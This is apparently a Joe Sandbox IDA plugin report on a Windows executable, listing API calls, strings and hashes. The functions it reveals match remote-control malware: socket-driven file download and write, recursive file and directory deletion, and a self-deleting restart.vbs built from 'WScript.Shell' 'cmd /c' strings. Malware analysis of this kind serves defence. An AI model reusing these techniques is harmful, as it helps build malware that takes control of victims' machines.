                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
                                                  • Part of subcall function 0041135A: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,0040375E,?,?), ref: 004113AF
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CBFC
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloading file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CC0E
                                                  • Part of subcall function 00410CD2: GetLocalTime.KERNEL32(?), ref: 00410CE9
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,%02i:%02i:%02i:%03i ,?,00414BC4,?,00413760,?,?,_E@,?), ref: 00410D1E
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,_E@,?), ref: 00410D2B
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,?,?,?,?,_E@,?), ref: 00410D38
                                                  • Part of subcall function 00410CD2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,_E@,?), ref: 00410D45
                                                  • Part of subcall function 00410CD2: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,_E@,?), ref: 00410D4F
                                                  • Part of subcall function 00410CD2: printf.MSVCRT ref: 00410D56
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D62
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D6B
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D74
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D7D
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D86
                                                  • Part of subcall function 00410CD2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,_E@), ref: 00410D8F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CC22
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CC2E
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000000), ref: 0040CC3B
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000004,?,?,?,?,?,?,?,00000000), ref: 0040CC4D
                                                • atoi.MSVCRT(00000000,?,?,?,?,?,?,?,00000000), ref: 0040CC54
                                                  • Part of subcall function 00403392: ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(00419278,00413670), ref: 004033B7
                                                  • Part of subcall function 00403392: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004033CA
                                                  • Part of subcall function 00403392: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 004033D3
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 004033F6
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 00403403
                                                  • Part of subcall function 00403392: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 0040340F
                                                  • Part of subcall function 00403392: recv.WS2_32(?,?,0000FDE8,00000000), ref: 00403435
                                                  • Part of subcall function 00403392: ?append@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV12@PBDI@Z.MSVCP60(?,00000000,?,?,0000FDE8,00000000), ref: 00403452
                                                  • Part of subcall function 00403392: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60 ref: 0040345F
                                                  • Part of subcall function 00403392: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?), ref: 00403474
                                                  • Part of subcall function 00403392: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00413670), ref: 00403482
                                                  • Part of subcall function 00403392: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000004,?), ref: 0040349A
                                                  • Part of subcall function 00403392: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004034D1
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CC8D
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CC97
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CCA1
                                                  • Part of subcall function 004118F7: CreateFileW.KERNEL32(6C9BB310,40000000,00000000,00000000,00000002,00000080,00000000,004137F0,6C9BB310), ref: 00411934
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CCB6
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CCE8
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Downloaded file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CCF5
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD09
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD15
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00413670,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0040CD2A
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60([INFO],?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023CA
                                                  • Part of subcall function 004023C0: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60([DataStart],00000013,?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023E3
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000B,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023EE
                                                  • Part of subcall function 004023C0: ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(0000000F,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 004023FB
                                                  • Part of subcall function 004023C0: ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040240D
                                                  • Part of subcall function 004023C0: ?empty@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE_NXZ.MSVCP60(?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402418
                                                  • Part of subcall function 004023C0: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402427
                                                  • Part of subcall function 004023C0: ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402431
                                                  • Part of subcall function 004023C0: send.WS2_32(?,00000000), ref: 0040243B
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 00402492
                                                  • Part of subcall function 004023C0: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,00402066,0040C2A1,?,0040C2A1,0000004B), ref: 0040249B
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CD67
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([ERROR],?,?,?,Failed to download file: ,00000000,?,00000000,?,00000000,00000000), ref: 0040CD78
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD8C
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000000), ref: 0040CD98
                                                • closesocket.WS2_32(00000000), ref: 0040CD9F
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040DB59
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E4F8
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,00000000), ref: 0040E501
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$D@std@@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$D@2@@0@V?$basic_string@$G@2@@std@@G@std@@Hstd@@$D@1@@$?c_str@?$basic_string@$?length@?$basic_string@V01@@V10@0@$V10@@$V01@$?begin@?$basic_string@?empty@?$basic_string@?size@?$basic_string@A?$basic_string@V10@Y?$basic_string@closesocket$??2@??4?$basic_string@??9std@@?append@?$basic_string@?data@?$basic_string@?end@?$basic_string@CreateFileG@1@@LocalTimeV12@atoiconnectprintfrecvsendsocket
                                                • String ID: Downloaded file: $Downloading file: $Failed to download file: $[ERROR]$[INFO]
                                                • API String ID: 2388945964-443951226
                                                • Opcode ID: c28a6256352649894b7e059b358dac71b3b984875bbeaa8f75105b1ff1592f31
                                                • Instruction ID: e8c415dd5cfb39da6f5ec30066b28b1e249f341bcce9b26bb1a66faa95a0ee01
                                                • Opcode Fuzzy Hash: c28a6256352649894b7e059b358dac71b3b984875bbeaa8f75105b1ff1592f31
                                                • Instruction Fuzzy Hash: A46154B2900119ABDB04BBA1DD4ADFF773CEB14305F0045AEF506E20A1EE385B448B69
                                                APIs
                                                  • Part of subcall function 0040A109: TerminateProcess.KERNEL32(00000000,00000001,0040771D,00419BC8,6C9BAFB0,00000001), ref: 0040A119
                                                  • Part of subcall function 0040A109: WaitForSingleObject.KERNEL32(000000FF), ref: 0040A12C
                                                • ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 00407F48
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00407F51
                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(EXEpath,?,00000208,00000000), ref: 00407F6F
                                                  • Part of subcall function 0040A9EF: RegOpenKeyExA.ADVAPI32(80000001,00407880,00000000,00020019,00407880), ref: 0040AA09
                                                  • Part of subcall function 0040A9EF: RegQueryValueExA.ADVAPI32(00407880,?,00000000,00000000,?,?,00000208), ref: 0040AA25
                                                  • Part of subcall function 0040A9EF: RegCloseKey.ADVAPI32(00407880), ref: 0040AA30
                                                • GetModuleFileNameW.KERNEL32(00000000,?,00000208), ref: 00407F92
                                                • _wgetenv.MSVCRT ref: 00407FA6
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 00407FB1
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00407FBC
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00407FC7
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV?$allocator@G@1@@Z.MSVCP60(?), ref: 00407FD4
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(""", 0,?,0041417C), ref: 00407FEB
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(CreateObject("WScript.Shell").Run "cmd /c "",?,?,00000000), ref: 00408005
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 00408010
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040801D
                                                • ??Hstd@@YA?AV?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@0@ABV10@PBG@Z.MSVCP60(?,00000000), ref: 0040802A
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 00408036
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040803F
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408048
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408051
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040805A
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 00408063
                                                • ??Y?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEAAV01@PBG@Z.MSVCP60(CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)), ref: 00408071
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 0040807B
                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000000), ref: 00408085
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000), ref: 00408091
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(004137F0,004137F0,00000000), ref: 004080AF
                                                • ShellExecuteW.SHELL32(00000000,open,00000000), ref: 004080BC
                                                • exit.MSVCRT ref: 004080C8
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004080D1
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 004080DA
                                                Strings
                                                Memory Dump Source
                                                • Source File: 0000000B.00000002.2304661050.0000000000401000.00000020.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                 • Associated: 0000000B.00000002.2304616306.0000000000400000.00000040.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304735960.0000000000413000.00000002.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304782815.0000000000419000.00000004.00000400.00020000.00000000.sdmp
                                                 • Associated: 0000000B.00000002.2304811098.000000000041A000.00000002.00000400.00020000.00000000.sdmp
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_11_2_400000_file.jbxd
                                                Yara matches
                                                Similarity
                                                • API ID: V?$allocator@$U?$char_traits@$G@std@@$G@2@@std@@$??1?$basic_string@$?c_str@?$basic_string@$??0?$basic_string@G@1@@G@2@@0@Hstd@@V?$basic_string@$D@2@@std@@D@std@@V10@$V01@Y?$basic_string@$?length@?$basic_string@?size@?$basic_string@CloseExecuteFileModuleNameObjectOpenProcessQueryShellSingleTerminateV01@@V10@0@ValueWait_wgetenvexit
                                                • String ID: """, 0$CreateObject("Scripting.FileSystemObject").DeleteFile(Wscript.ScriptFullName)$CreateObject("WScript.Shell").Run "cmd /c ""$EXEpath$Temp$\restart.vbs$open
                                                • API String ID: 864010295-4180105237
                                                • Opcode ID: 6f1963485c5031096f3f15ee8cf2af56c53296f010a98b0800f9df22f355fc11
                                                • Instruction ID: 009f9f871ec5401263e58cc18b3d2d61739dc010462bfa9fbe52de67a4c43b8b
                                                • Opcode Fuzzy Hash: 6f1963485c5031096f3f15ee8cf2af56c53296f010a98b0800f9df22f355fc11
                                                • Instruction Fuzzy Hash: 9F41FF72900119AFCB04EFA0ED59DEE7B7CEB54306B1041BAF506E20A1EF745B49CB69
                                                APIs
                                                  • Part of subcall function 004113E6: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00419970,00419BC8,00000000,00408808,)A,00000000,0000000B), ref: 004113F2
                                                  • Part of subcall function 004113E6: ??2@YAPAXI@Z.MSVCRT(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411400
                                                  • Part of subcall function 004113E6: ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411422
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E), ref: 00411444
                                                  • Part of subcall function 004113E6: ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411458
                                                  • Part of subcall function 004113E6: ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,0000000E,00413764), ref: 00411461
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?), ref: 0040CDCC
                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(00000000), ref: 0040CDD6
                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60 ref: 0040CDE2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CDEB
                                                • GetFileAttributesW.KERNEL32(00000000), ref: 0040CDF2
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CDFF
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 004117AB
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 004117BF
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 004117CB
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 004117D9
                                                  • Part of subcall function 0041178F: FindFirstFileW.KERNEL32(?,?), ref: 004117EC
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 0041180C
                                                  • Part of subcall function 0041178F: FindNextFileW.KERNEL32(?,?), ref: 00411824
                                                  • Part of subcall function 0041178F: wcscat.MSVCRT ref: 00411855
                                                  • Part of subcall function 0041178F: RemoveDirectoryW.KERNEL32(?), ref: 0041187A
                                                  • Part of subcall function 0041178F: wcscpy.MSVCRT ref: 0041188A
                                                  • Part of subcall function 0041178F: FindClose.KERNEL32(?), ref: 004118DA
                                                  • Part of subcall function 0041178F: RemoveDirectoryW.KERNEL32(?), ref: 004118E3
                                                  • Part of subcall function 004113BA: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(?,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113C5
                                                  • Part of subcall function 004113BA: ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113D1
                                                  • Part of subcall function 004113BA: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040BF0A,?,00419958,00419288,?,00419288,?), ref: 004113DB
                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60 ref: 0040CE0E
                                                • DeleteFileW.KERNEL32(00000000), ref: 0040CE15
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,Deleted file: ,00000000,?,?,?,?), ref: 0040CE3F
                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60([INFO],?,?,?,Deleted file: ,00000000,?,?,?,?), ref: 0040CE50
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000,00000002,?,00000000,?,?,?,?), ref: 0040CE8D
                                                • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 0040CE97
                                                  • Part of subcall function 00402049: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,[INFO],?,0040C2A1,0000004B), ref: 00402058
                                                  • Part of subcall function 00402049: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040206E
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000055), ref: 0040CEB1
                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040CEBD
                                                  • Part of subcall function 0041135A: ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,0040375E,?,?), ref: 00411369
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411373
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,?,0040375E,?,?), ref: 0041137C
                                                  • Part of subcall function 0041135A: ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411386
                                                  • Part of subcall function 0041135A: ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,?,0040375E,?,?), ref: 00411390
                                                  • Part of subcall function 0041135A: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,0040375E,?,?), ref: 004113A6
